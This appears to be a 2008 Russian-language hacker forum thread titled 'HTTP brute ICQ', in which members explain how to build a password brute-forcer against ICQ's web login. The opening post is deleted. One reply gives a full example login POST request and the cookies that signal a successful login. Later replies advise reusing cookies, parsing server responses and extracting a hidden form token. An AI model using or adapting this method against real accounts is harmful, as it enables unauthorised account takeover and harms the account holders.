HTTP brute ICQ

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by Flenov, 30 Dec 2008.

  1. Flenov

    Flenov Member

    Joined:
    22 Nov 2008
    Messages:
    20
    Likes Received:
    17
    Reputations:
    0
    deleted
     
    #1 Flenov, 30 Dec 2008
    Last edited: 29 Jan 2015
    3 people like this.
  2. neprovad

    neprovad Elder - Старейшина

    Joined:
    19 Oct 2007
    Messages:
    899
    Likes Received:
    274
    Reputations:
    59
    Пост запрос для примера. Проверять будем условно на uin 123456
    Code:
    Host=www.icq.com
    User-Agent=Mozilla/4.0 (Mozilla; FreeBSD 3.2-RELEASE i386)
    Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language=ru,en-us;q=0.7,en;q=0.3
    Accept-Encoding=gzip,deflate
    Accept-Charset=windows-1251,utf-8;q=0.7,*;q=0.7
    Keep-Alive=300
    Connection=keep-alive
    Referer=https://www.icq.com/karma/login_page.php
    Cookie=icq_ln=твой кукис;
    Content-Type=application/x-www-form-urlencoded
    Content-Length=147
    POSTDATA=dest=http%3A%2F%2Fwww.icq.com&service=30&icq_ln=твой кукис&uin_email=123456&password=#d*L8qP@
    
    Если response header содержит поля, то ты удачно залогинился.
    Code:
    Status=OK - 200
    Date=Tue, 30 Dec 2008 19:14:35 GMT
    Server=Apache
    Set-Cookie=[b]karma_user_123456[/b]=xekker; expires=Wed, 30-Dec-2009 19:14:35 GMT; path=/; domain=.icq.com
    [b]karma_email_123456[/b]=xeka%40nasa.gov; expires=Wed, 30-Dec-2009 19:14:35 GMT; path=/; domain=.icq.com
    [b]karma_login[/b]=123456; expires=Wed, 30-Dec-2009 19:14:35 GMT; path=/; domain=.icq.com
    karma_session=кукис еще один; path=/; domain=.icq.com
    karma_service=кукис; path=/; domain=.icq.com
    P3P=CP="ONL UNI COM PHY NAV INT DEM CURo OUR"
    Keep-Alive=timeout=6, max=50
    Connection=Keep-Alive
    Transfer-Encoding=chunked
    Content-Type=text/html
    
     
  3. neprovad

    neprovad Elder - Старейшина

    Joined:
    19 Oct 2007
    Messages:
    899
    Likes Received:
    274
    Reputations:
    59
    Редирект тебе не нужен, для брута достаточно ставить куки и анализировать ответы сервера. Получается даже get запросы не нужны, если я ничего не упустил из виду
    upd
    Нужен один раз get запрос при старте, чтоб выловить куки, и работать дальше какое-то время
     
    #3 neprovad, 30 Dec 2008
    Last edited: 30 Dec 2008
  4. De-visible

    De-visible [NDC] Network develope c0ders

    Joined:
    6 Jan 2008
    Messages:
    916
    Likes Received:
    550
    Reputations:
    66
    О_о, трабла выдрать Set_cookie? нахер редирект?
     
  5. t00th

    t00th Banned

    Joined:
    15 Jul 2007
    Messages:
    37
    Likes Received:
    15
    Reputations:
    6
    Рано значит решил брут писать раз просишь готовые исходники тебе выложить
     
  6. neprovad

    neprovad Elder - Старейшина

    Joined:
    19 Oct 2007
    Messages:
    899
    Likes Received:
    274
    Reputations:
    59
    похоже что icq_ln находится не только в кукисах а в одном скрытом поле формы логина
    и post данные надо снабжать тем icq_ln что в этом скрытом (визуально) поле.